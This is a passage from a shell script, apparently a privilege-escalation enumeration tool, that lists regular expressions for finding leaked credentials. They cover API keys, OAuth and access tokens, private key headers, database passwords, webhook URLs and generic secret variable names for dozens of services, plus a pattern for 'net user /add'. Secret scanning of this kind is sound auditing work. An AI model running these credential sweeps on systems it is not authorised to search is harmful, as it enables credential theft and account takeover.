"cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" search_for_regex "Coinlayer API
Key" "(coinlayer[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1
search_for_regex "Coinlib API Key" "(coinlib[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{16})['\"]" 1
search_for_regex "Contentful delivery API Key" "(contentful[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9=_\-]{43})['\"]" 1
search_for_regex "Covalent API Key" "ckey_[a-z0-9]{27}" search_for_regex
"Charity Search API Key" "(charity.?search[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1
search_for_regex "Databricks API Key" "dapi[a-h0-9]{32}" search_for_regex
"DDownload API Key" "(ddownload[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{22})['\"]" 1
search_for_regex "Defined Networking API token"
"(dnkey-[a-z0-9=_\-]{26}-[a-z0-9=_\-]{52})" search_for_regex "Discord API Key,
Client ID & Client Secret" "((discord[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-h0-9]{64}|[0-9]{18}|[a-z0-9=_\-]{32})['\"])"
1 search_for_regex "Dropbox API Key" "sl.[a-zA-Z0-9_-]{136}" search_for_regex
"Doppler API Key" "(dp\.pt\.)[a-zA-Z0-9]{43}" search_for_regex "Dropbox API
secret/key, short & long lived API Key" "(dropbox[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{15}|sl\.[a-z0-9=_\-]{135}|[a-z0-9]{11}(AAAAAAAAAA)[a-z0-9_=\-]{43})['\"]"
1 search_for_regex "Duffel API Key" "duffel_(test|live)_[a-zA-Z0-9_-]{43}"
search_for_regex "Dynatrace API Key" "dt0c01\.[a-zA-Z0-9]{24}\.[a-z0-9]{64}"
search_for_regex "EasyPost API Key" "EZAK[a-zA-Z0-9]{54}" search_for_regex
"EasyPost test API Key" "EZTK[a-zA-Z0-9]{54}" search_for_regex "Etherscan API
Key" "(etherscan[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([A-Z0-9]{34})['\"]"
search_for_regex "Facebook Access Token" "EAACEdEose0cBA[0-9A-Za-z]+"
search_for_regex "Facebook Client ID"
"([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}"
search_for_regex "Facebook Oauth"
"[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" search_for_regex
"Facebook Secret Key"
"([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}"
search_for_regex "Fastly API Key" "(fastly[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9=_\-]{32})['\"]" 1
search_for_regex "Finicity API Key & Client Secret" "(finicity[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{32}|[a-z0-9]{20})['\"]"
1 search_for_regex "Flutterweave Keys"
"FLWPUBK_TEST-[a-hA-H0-9]{32}-X|FLWSECK_TEST-[a-hA-H0-9]{32}-X|FLWSECK_TEST[a-hA-H0-9]{12}"
search_for_regex "Frame.io API Key" "fio-u-[a-zA-Z0-9_=\-]{64}" search_for_regex
"Github" "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" search_for_regex "Github App
Token" "(ghu|ghs)_[0-9a-zA-Z]{36}" search_for_regex "Github OAuth Access Token"
"gho_[0-9a-zA-Z]{36}" search_for_regex "Github Personal Access Token"
"ghp_[0-9a-zA-Z]{36}" search_for_regex "Github Refresh Token"
"ghr_[0-9a-zA-Z]{76}" search_for_regex "GitHub Fine-Grained Personal Access
Token" "github_pat_[0-9a-zA-Z_]{82}" search_for_regex "Gitlab Personal Access
Token" "glpat-[0-9a-zA-Z\-]{20}" search_for_regex "GitLab Pipeline Trigger
Token" "glptt-[0-9a-f]{40}" search_for_regex "GitLab Runner Registration Token"
"GR1348941[0-9a-zA-Z_\-]{20}" search_for_regex "GoCardless API Key"
"live_[a-zA-Z0-9_=\-]{40}" search_for_regex "GoFile API Key" "(gofile[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{32})['\"]" 1
search_for_regex "Google API Key" "AIza[0-9A-Za-z_\-]{35}" search_for_regex
"Google Cloud Platform API Key"
"(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]"
search_for_regex "Google Drive Oauth"
"[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" search_for_regex "Google
Oauth Access Token" "ya29\.[0-9A-Za-z_\-]+" search_for_regex "Google (GCP)
Service-account" "\"type.+:.+\"service_account" search_for_regex "Grafana API
Key" "eyJrIjoi[a-z0-9_=\-]{72,92}" 1 search_for_regex "Grafana cloud api token"
"glc_[A-Za-z0-9\+/]{32,}={0,2}" search_for_regex "Grafana service account token"
"(glsa_[A-Za-z0-9]{32}_[A-Fa-f0-9]{8})" search_for_regex "Hashicorp Terraform
user/org API Key" "[a-z0-9]{14}\.atlasv1\.[a-z0-9_=\-]{60,70}" search_for_regex
"Heroku API Key"
"[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}"
search_for_regex "Hubspot API Key"
"['\"][a-h0-9]{8}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{12}['\"]" 1
search_for_regex "Instatus API Key" "(instatus[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1
search_for_regex "Intercom API Key & Client Secret/ID" "(intercom[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9=_]{60}|[a-h0-9]{8}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{12})['\"]"
1 search_for_regex "Ionic API Key" "(ionic[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"](ion_[a-z0-9]{42})['\"]" 1
search_for_regex "Jenkins Creds" "<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
search_for_regex "JSON Web Token"
"(ey[0-9a-z]{30,34}\.ey[0-9a-z\/_\-]{30,}\.[0-9a-zA-Z\/_\-]{10,}={0,2})"
search_for_regex "Linear API Key" "(lin_api_[a-zA-Z0-9]{40})" search_for_regex
"Linear Client Secret/ID" "((linear[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{32})['\"])"
search_for_regex "LinkedIn Client ID" "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]"
search_for_regex "LinkedIn Secret Key"
"linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" search_for_regex "Lob API Key"
"((lob[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]((live|test)_[a-f0-9]{35})['\"])|((lob[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]((test|live)_pub_[a-f0-9]{31})['\"])"
1 search_for_regex "Lob Publishable API Key" "((test|live)_pub_[a-f0-9]{31})"
search_for_regex "MailboxValidator" "(mailbox.?validator[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([A-Z0-9]{20})['\"]" 1
search_for_regex "Mailchimp API Key" "[0-9a-f]{32}-us[0-9]{1,2}"
search_for_regex "Mailgun API Key" "key-[0-9a-zA-Z]{32}'" search_for_regex
"Mailgun Public Validation Key" "pubkey-[a-f0-9]{32}" search_for_regex "Mailgun
Webhook signing key" "[a-h0-9]{32}-[a-h0-9]{8}-[a-h0-9]{8}" search_for_regex
"Mandrill API Key" "md-[a-z0-9A-Z_-]{22}" search_for_regex "Mapbox API Key"
"(pk\.[a-z0-9]{60}\.[a-z0-9]{22})" 1 search_for_regex "MessageBird API Key & API
client ID" "(messagebird[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{25}|[a-h0-9]{8}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{4}-[a-h0-9]{12})['\"]"
1 search_for_regex "Microsoft Teams Webhook"
"https:\/\/[a-z0-9]+\.webhook\.office\.com\/webhookb2\/[a-z0-9]{8}-([a-z0-9]{4}-){3}[a-z0-9]{12}@[a-z0-9]{8}-([a-z0-9]{4}-){3}[a-z0-9]{12}\/IncomingWebhook\/[a-z0-9]{32}\/[a-z0-9]{8}-([a-z0-9]{4}-){3}[a-z0-9]{12}"
search_for_regex "New Relic User API Key, User API ID & Ingest Browser API Key"
"(NRAK-[A-Z0-9]{27})|((newrelic[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([A-Z0-9]{64})['\"])|(NRJS-[a-f0-9]{19})"
search_for_regex "Nownodes" "(nownodes[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([A-Za-z0-9]{32})['\"]"
search_for_regex "Npm Access Token" "(npm_[a-zA-Z0-9]{36})" search_for_regex
"OpenAI API Token" "sk-[A-Za-z0-9]{48}" search_for_regex "ORB Intelligence
Access Key"
"['\"][a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}['\"]"
search_for_regex "Pastebin API Key" "(pastebin[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"]" 1
search_for_regex "PayPal Braintree Access Token"
"access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}" search_for_regex "Picatic
API Key" "sk_live_[0-9a-z]{32}" search_for_regex "Pinata API Key"
"(pinata[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{64})['\"]" 1
search_for_regex "Planetscale API Key" "pscale_tkn_[a-zA-Z0-9_\.\-]{43}"
search_for_regex "PlanetScale OAuth token"
"(pscale_oauth_[a-zA-Z0-9_\.\-]{32,64})" search_for_regex "Planetscale Password"
"pscale_pw_[a-zA-Z0-9_\.\-]{43}" search_for_regex "Plaid API Token"
"(access-(?:sandbox|development|production)-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})"
search_for_regex "Prefect API token" "(pnu_[a-z0-9]{36})" search_for_regex
"Postman API Key" "PMAK-[a-fA-F0-9]{24}-[a-fA-F0-9]{34}" search_for_regex
"Private Keys" "\-\-\-\-\-BEGIN PRIVATE KEY\-\-\-\-\-|\-\-\-\-\-BEGIN RSA
PRIVATE KEY\-\-\-\-\-|\-\-\-\-\-BEGIN OPENSSH PRIVATE
KEY\-\-\-\-\-|\-\-\-\-\-BEGIN PGP PRIVATE KEY BLOCK\-\-\-\-\-|\-\-\-\-\-BEGIN
DSA PRIVATE KEY\-\-\-\-\-|\-\-\-\-\-BEGIN EC PRIVATE KEY\-\-\-\-\-"
search_for_regex "Pulumi API Key" "pul-[a-f0-9]{40}" search_for_regex "PyPI
upload token" "pypi-AgEIcHlwaS5vcmc[A-Za-z0-9_\-]{50,}" search_for_regex "Quip
API Key" "(quip[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{15}=\|[0-9]{10}\|[a-zA-Z0-9\/+]{43}=)['\"]"
1 search_for_regex "Rubygem API Key" "rubygems_[a-f0-9]{48}" search_for_regex
"Readme API token" "rdme_[a-z0-9]{70}" search_for_regex "Sendbird Access ID"
"([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})"
search_for_regex "Sendgrid API Key" "SG\.[a-zA-Z0-9_\.\-]{66}" search_for_regex
"Sendinblue API Key" "xkeysib-[a-f0-9]{64}-[a-zA-Z0-9]{16}" search_for_regex
"Shippo API Key, Access Token, Custom Access Token, Private App Access Token &
Shared Secret"
"shippo_(live|test)_[a-f0-9]{40}|shpat_[a-fA-F0-9]{32}|shpca_[a-fA-F0-9]{32}|shppa_[a-fA-F0-9]{32}|shpss_[a-fA-F0-9]{32}"
search_for_regex "Sidekiq Secret" "([a-f0-9]{8}:[a-f0-9]{8})" search_for_regex
"Sidekiq Sensitive URL"
"([a-f0-9]{8}:[a-f0-9]{8})@(?:gems.contribsys.com|enterprise.contribsys.com)"
search_for_regex "Slack Token" "xox[baprs]-([0-9a-zA-Z]{10,48})?"
search_for_regex "Slack Webhook"
"https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}"
search_for_regex "Smarksheel API Key" "(smartsheet[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{26})['\"]" 1
search_for_regex "Square Access Token" "sqOatp-[0-9A-Za-z_\-]{22}"
search_for_regex "Square API Key" "EAAAE[a-zA-Z0-9_-]{59}" search_for_regex
"Square Oauth Secret" "sq0csp-[ 0-9A-Za-z_\-]{43}" search_for_regex "Stytch API
Key" "secret-.*-[a-zA-Z0-9_=\-]{36}" search_for_regex "Stripe Access Token & API
Key" "(sk|pk)_(test|live)_[0-9a-z]{10,32}|k_live_[0-9a-zA-Z]{24}" 1
search_for_regex "Telegram Bot API Token" "[0-9]+:AA[0-9A-Za-z\\-_]{33}"
search_for_regex "Trello API Key" "(trello[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9a-z]{32})['\"]"
search_for_regex "Twilio API Key" "SK[0-9a-fA-F]{32}" search_for_regex "Twitch
API Key" "(twitch[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{30})['\"]"
search_for_regex "Twitter Client ID"
"[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" search_for_regex
"Twitter Bearer Token" "(A{22}[a-zA-Z0-9%]{80,100})" search_for_regex "Twitter
Oauth" "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]"
search_for_regex "Twitter Secret Key"
"[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" search_for_regex
"Typeform API Key" "tfp_[a-z0-9_\.=\-]{59}" search_for_regex "URLScan API Key"
"['\"][a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}['\"]"
search_for_regex "Yandex Access Token"
"(t1\.[A-Z0-9a-z_-]+[=]{0,2}\.[A-Z0-9a-z_-]{86}[=]{0,2})" search_for_regex
"Yandex API Key" "(AQVN[A-Za-z0-9_\-]{35,38})" search_for_regex "Web3 API Key"
"(web3[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([A-Za-z0-9_=\-]+\.[A-Za-z0-9_=\-]+\.?[A-Za-z0-9_.+/=\-]*)['\"]"
1 echo '' print_2title "Searching Misc" search_for_regex "Generic Secret"
"[sS][eE][cC][rR][eE][tT].*['\"][0-9a-zA-Z]{32,45}['\"]" search_for_regex "PHP
defined password" "define ?\(['\"](\w*pass|\w*pwd|\w*user|\w*datab)"
search_for_regex "Simple Passwords" "passw.*[=:].+" search_for_regex "Generic
API tokens search (A-C)"
"(access_key|access_token|account_sid|admin_email|admin_pass|admin_user|adzerk_api_key|algolia_admin_key|algolia_api_key|
algolia_search_key|alias_pass|alicloud_access_key|alicloud_secret_key|amazon_bucket_name|amazon_secret_access_key|
amazonaws|anaconda_token|android_docs_deploy_token|ansible_vault_password|aos_key|aos_sec|
api_key|api_key_secret|api_key_sid|api_secret|apiary_api_key|apigw_access_token|api.googlemaps|AIza|apidocs|
apikey|apiSecret|app_bucket_perm|appclientsecret|app_debug|app_id|appkey|appkeysecret|app_key|app_log_level|app_report_token_key|
app_secret|app_token|apple_id_password|application_key|appsecret|appspot|argos_token|artifactory_key|artifacts_aws_access_key_id|
artifacts_aws_secret_access_key|artifacts_bucket|artifacts_key|artifacts_secret|assistant_iam_apikey|auth0_api_clientsecret|
auth0_client_secret|auth_token|authorizationToken|author_email_addr|author_npm_api_key|authsecret|awsaccesskeyid|aws_access|
aws_access_key|aws_access_key_id|aws_bucket|aws_config_accesskeyid|aws_key|aws_secret|aws_secret_access_key|awssecretkey|
aws_secret_key|aws_secrets|aws_ses_access_key_id|aws_ses_secret_access_key|aws_token|awscn_access_key_id|awscn_secret_access_key|
AWSSecretKey|b2_app_key|b2_bucket|bashrc
password|bintray_api_key|bintray_apikey|bintray_gpg_password|bintray_key|
bintray_token|bintraykey|bluemix_api_key|bluemix_auth|bluemix_pass|bluemix_pass_prod|bluemix_password|bluemix_pwd|bluemix_username
brackets_repo_oauth_token|browser_stack_access_key|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|
bucketeer_aws_secret_access_key|built_branch_deploy_key|bundlesize_github_token|bx_password|bx_username|cache_driver|
cache_s3_secret_key|cargo_token|cattle_access_key|cattle_agent_instance_auth|cattle_secret_key|censys_secret|certificate_password|
cf_password|cheverny_token|chrome_client_secret|chrome_refresh_token|ci_deploy_password|ci_project_url|ci_registry_user|
ci_server_name|ci_user_token|claimr_database|claimr_db|claimr_superuser|claimr_token|cli_e2e_cma_token|client_secret|
client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|
cloudant_archived_database|cloudant_audited_database|cloudant_database|cloudant_instance|cloudant_order_database|
cloudant_parsed_database|cloudant_password|cloudant_processed_database|cloudant_service_database|
cloudflare_api_key|cloudflare_auth_email|cloudflare_auth_key|cloudflare_email|cloudinary_api_secret|cloudinary_name|
cloudinary_url|cloudinary_url_staging|clu_repo_url|clu_ssh_private_key_base64|cn_access_key_id|cn_secret_access_key|
cocoapods_trunk_email|cocoapods_trunk_token|codacy_project_token|codeclimate_repo_token|codecov_token|coding_token|
conekta_apikey|conn.login|connectionstring|consumerkey|consumer_key|consumer_secret|contentful_access_token|
contentful_cma_test_token|contentful_integration_management_token|contentful_integration_management_token|
contentful_management_api_access_token|contentful_management_api_access_token_new|contentful_php_management_test_token|
contentful_test_org_cma_token|contentful_v2_access_token|conversation_password|conversation_username|cos_secrets|
coveralls_api_token|coveralls_repo_token|coveralls_token|coverity_scan_token|credentials|
cypress_record_key)[a-z0-9_
.,<\-]{0,25}(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\-]{8,64})['\"]"
search_for_regex "Generic API tokens search (D-H)"
"(danger_github_api_token|database_host|database_name|database_password|database_port|database_schema_test|
database_user|database_username|datadog_api_key|datadog_app_key|db_connection|db_database|db_host|db_password|
db_pw|db_server|db_user|db_username|dbpasswd|dbpassword|dbuser|ddg_test_email|ddg_test_email_pw|ddgc_github_token|
deploy_password|deploy_secure|deploy_token|deploy_user|dgpg_passphrase|digitalocean_access_token|
digitalocean_ssh_key_body|digitalocean_ssh_key_ids|docker_hub_password|docker_key|docker_pass|docker_passwd|
docker_password|docker_postgres_url|docker_token|dockerhub_password|dockerhubpassword|doordash_auth_token|
dot-files|dotfiles|dropbox_oauth_bearer|droplet_travis_password|dsonar_login|dsonar_projectkey|dynamoaccesskeyid|
dynamosecretaccesskey|elastic_cloud_auth|elastica_host|elastica_port|elasticsearch_password|encryption_key|
encryption_password|end_user_password|env_github_oauth_token|env_heroku_api_key|env_key|env_secret|env_secret_access_key|
env_sonatype_password|eureka_awssecretkey|env.heroku_api_key|env.sonatype_password|eureka.awssecretkey|exp_password|
file_password|firebase_api_json|firebase_api_token|firebase_key|firebase_project_develop|firebase_token|firefox_secret|
flask_secret_key|flickr_api_key|flickr_api_secret|fossa_api_key|ftp_host|ftp_login|ftp_password|ftp_pw|ftp_user|ftp_username|
gcloud_bucket|gcloud_project|gcloud_service_key|gcr_password|gcs_bucket|gh_api_key|gh_email|gh_next_oauth_client_secret|
gh_next_unstable_oauth_client_id|gh_next_unstable_oauth_client_secret|gh_oauth_client_secret|gh_oauth_token|gh_repo_token|
gh_token|gh_unstable_oauth_client_secret|ghb_token|ghost_api_key|git_author_email|git_author_name|git_committer_email|
git_committer_name|git_email|git_name|git_token|github_access_token|github_api_key|github_api_token|github_auth|github_auth_token|
github_auth_token|github_client_secret|github_deploy_hb_doc_pass|github_deployment_token|github_hunter_token|github_hunter_username|
github_key|github_oauth|github_oauth_token|github_oauth_token|github_password|github_pwd|github_release_token|github_repo|
github_token|github_tokens|gitlab_user_email|gogs_password|google_account_type|google_client_email|google_client_id|google_client_secret|
google_maps_api_key|google_private_key|gpg_key_name|gpg_keyname|gpg_ownertrust|gpg_passphrase|gpg_private_key|gpg_secret_keys|
gradle_publish_key|gradle_publish_secret|gradle_signing_key_id|gradle_signing_password|gren_github_token|grgit_user|hab_auth_token|
hab_key|hb_codesign_gpg_pass|hb_codesign_key_pass|heroku_api_key|heroku_email|heroku_token|hockeyapp_token|homebrew_github_api_token|
hub_dxia2_password)[a-z0-9_
.,<\-]{0,25}(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\-]{8,64})['\"]"
search_for_regex "Generic API tokens search (I-R)"
"(ij_repo_password|ij_repo_username|index_name|integration_test_api_key|integration_test_appid|internal_secrets|
ios_docs_deploy_token|itest_gh_token|jdbc_databaseurl|jdbc_host|jdbc:mysql|jwt_secret|kafka_admin_url|kafka_instance_name|kafka_rest_url|
keystore_pass|kovan_private_key|kubecfg_s3_path|kubeconfig|kxoltsn3vogdop92m|leanplum_key|lektor_deploy_password|lektor_deploy_username|
lighthouse_api_key|linkedin_client_secretorlottie_s3_api_key|linux_signing_key|ll_publish_url|ll_shared_key|looker_test_runner_client_secret|
lottie_happo_api_key|lottie_happo_secret_key|lottie_s3_secret_key|lottie_upload_cert_key_password|lottie_upload_cert_key_store_password|
mail_password|mailchimp_api_key|mailchimp_key|mailer_password|mailgun_api_key|mailgun_apikey|mailgun_password|mailgun_priv_key|
mailgun_pub_apikey|mailgun_pub_key|mailgun_secret_api_key|manage_key|manage_secret|management_token|managementapiaccesstoken|
manifest_app_token|manifest_app_url|mapbox_access_token|mapbox_api_token|mapbox_aws_access_key_id|mapbox_aws_secret_access_key|
mapboxaccesstoken|mg_api_key|mg_public_api_key|mh_apikey|mh_password|mile_zero_key|minio_access_key|minio_secret_key|multi_bob_sid|
multi_connect_sid|multi_disconnect_sid|multi_workflow_sid|multi_workspace_sid|my_secret_env|mysql_database|mysql_hostname|mysql_password|
mysql_root_password|mysql_user|mysql_username|mysqlmasteruser|mysqlsecret|nativeevents|netlify_api_key|new_relic_beta_token|nexus_password|
nexuspassword|ngrok_auth_token|ngrok_token|node_env|node_pre_gyp_accesskeyid|node_pre_gyp_github_token|node_pre_gyp_secretaccesskey|
non_token|now_token|npm_api_key|npm_api_token|npm_auth_token|npm_email|npm_password|npm_secret_key|npm_token|nuget_api_key|nuget_apikey|
nuget_key|numbers_service_pass|oauth_token|object_storage_password|object_storage_region_name|object_store_bucket|object_store_creds|
oc_pass|octest_app_password|octest_app_username|octest_password|ofta_key|ofta_region|ofta_secret|okta_client_token|okta_oauth2_client_secret|
okta_oauth2_clientsecret|onesignal_api_key|onesignal_user_auth_key|open_whisk_key|openwhisk_key|org_gradle_project_sonatype_nexus_password|
org_project_gradle_sonatype_nexus_password|os_auth_url|os_password|ossrh_jira_password|ossrh_pass|ossrh_password|ossrh_secret|
ossrh_username|packagecloud_token|pagerduty_apikey|parse_js_key|passwordtravis|paypal_client_secret|percy_project|percy_token|personal_key|
personal_secret|pg_database|pg_host|places_api_key|places_apikey|plotly_apikey|plugin_password|postgresql_db|postgresql_pass|
postgres_env_postgres_db|postgres_env_postgres_password|preferred_username|pring_mail_username|private_signing_password|prod_access_key_id|
prod_password|prod_secret_key|project_config|publish_access|publish_key|publish_secret|pushover_token|pypi_passowrd|qiita_token|
quip_token|rabbitmq_password|randrmusicapiaccesstoken|redis_stunnel_urls|rediscloud_url|refresh_token|registry_pass|registry_secure|
release_gh_token|release_token|reporting_webdav_pwd|reporting_webdav_url|repotoken|rest_api_key|rinkeby_private_key|ropsten_private_key|
route53_access_key_id|rtd_key_pass|rtd_store_pass|rubygems_auth_token)[a-z0-9_
.,<\-]{0,25}(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\-]{8,64})['\"]"
search_for_regex "Generic API tokens search (S-Z)"
"(s3_access_key|s3_access_key_id|s3_bucket_name_app_logs|s3_bucket_name_assets|s3_external_3_amazonaws_com|s3_key|
s3_key_app_logs|s3_key_assets|s3_secret_app_logs|s3_secret_assets|s3_secret_key|s3_user_secret|sacloud_access_token|
sacloud_access_token_secret|sacloud_api|salesforce_bulk_test_password|salesforce_bulk_test_security_token|
sandbox_access_token|sandbox_aws_access_key_id|sandbox_aws_secret_access_key|sauce_access_key|scrutinizer_token|sdr_token|secret_0|
secret_1|secret_10|secret_11|secret_2|secret_3|secret_4|secret_5|secret_6|secret_7|secret_8|secret_9|secret_key_base|secretaccesskey|
secret_key_base|segment_api_key|selion_log_level_dev|selion_selenium_host|sendgrid|sendgrid_api_key|sendgrid_key|sendgrid_password|sendgrid_user|
sendgrid_username|sendwithus_key|sentry_auth_token|sentry_default_org|sentry_endpoint|sentry_secret|sentry_key|service_account_secret|ses_access_key|
ses_secret_key|setdstaccesskey|setdstsecretkey|setsecretkey|signing_key|signing_key_password|signing_key_secret|signing_key_sid|slash_developer_space|
slash_developer_space_key|slate_user_email|snoowrap_client_secret|snoowrap_password|snoowrap_refresh_token|snyk_api_token|snyk_token|
socrata_app_token|socrata_password|sonar_organization_key|sonar_project_key|sonar_token|sonatype_gpg_key_name|sonatype_gpg_passphrase|
sonatype_nexus_password|sonatype_pass|sonatype_password|sonatype_token_password|sonatype_token_user|sonatypepassword|soundcloud_client_secret|
soundcloud_password|spaces_access_key_id|spaces_secret_access_key|spotify_api_access_token|spotify_api_client_secret|spring_mail_password|sqsaccesskey|
sqssecretkey|square_reader_sdk_repository_password|srcclr_api_token|sshpass|ssmtp_config|staging_base_url_runscope|star_test_aws_access_key_id|
star_test_bucket|star_test_location|star_test_secret_access_key|starship_account_sid|starship_auth_token|stormpath_api_key_id|stormpath_api_key_secret|
strip_publishable_key|strip_secret_key|stripe_private|stripe_public|surge_login|surge_token|svn_pass|tesco_api_key|test_github_token|
test_test|tester_keys_password|thera_oss_access_key|token_core_java|travis_access_token|travis_api_token|travis_branch|travis_com_token|travis_e2e_token|
travis_gh_token|travis_pull_request|travis_secure_env_vars|travis_token|trex_client_token|trex_okta_client_token|twilio_api_key|twilio_api_secret|
twilio_chat_account_api_service|twilio_configuration_sid|twilio_sid|twilio_token|twine_password|twitter_consumer_key|twitter_consumer_secret|twitteroauthaccesssecret|
twitteroauthaccesstoken|unity_password|unity_serial|urban_key|urban_master_secret|urban_secret|us_east_1_elb_amazonaws_com|use_ssh|
user_assets_access_key_id|user_assets_secret_access_key|usertravis|v_sfdc_client_secret|v_sfdc_password|vip_github_build_repo_deploy_key|vip_github_deploy_key|
vip_github_deploy_key_pass|virustotal_apikey|visual_recognition_api_key|vscetoken|wakatime_api_key|watson_conversation_password|watson_device_password|
watson_password|widget_basic_password|widget_basic_password_2|widget_basic_password_3|widget_basic_password_4|widget_basic_password_5|widget_fb_password|
widget_fb_password_2|widget_fb_password_3|widget_test_server|wincert_password|wordpress_db_password|wordpress_db_user|wpjm_phpunit_google_geocode_api_key|
wporg_password|wpt_db_password|wpt_db_user|wpt_prepare_dir|wpt_report_api_key|wpt_ssh_connect|wpt_ssh_private_key_base64|www_googleapis_com|
yangshun_gh_password|yangshun_gh_token|yt_account_client_secret|yt_account_refresh_token|yt_api_key|yt_client_secret|yt_partner_client_secret|
yt_partner_refresh_token|yt_server_api_key|zensonatypepassword|zhuliang_gh_token|zopim_account_key)[a-z0-9_
.,<\-]{0,25}(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\-]{8,64})['\"]"
search_for_regex "Net user add" "net user .+ /add" echo '' else echo "Regexes to
search for API keys aren't activated, use param '-r' " fi fi echo '' echo '' if
[ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi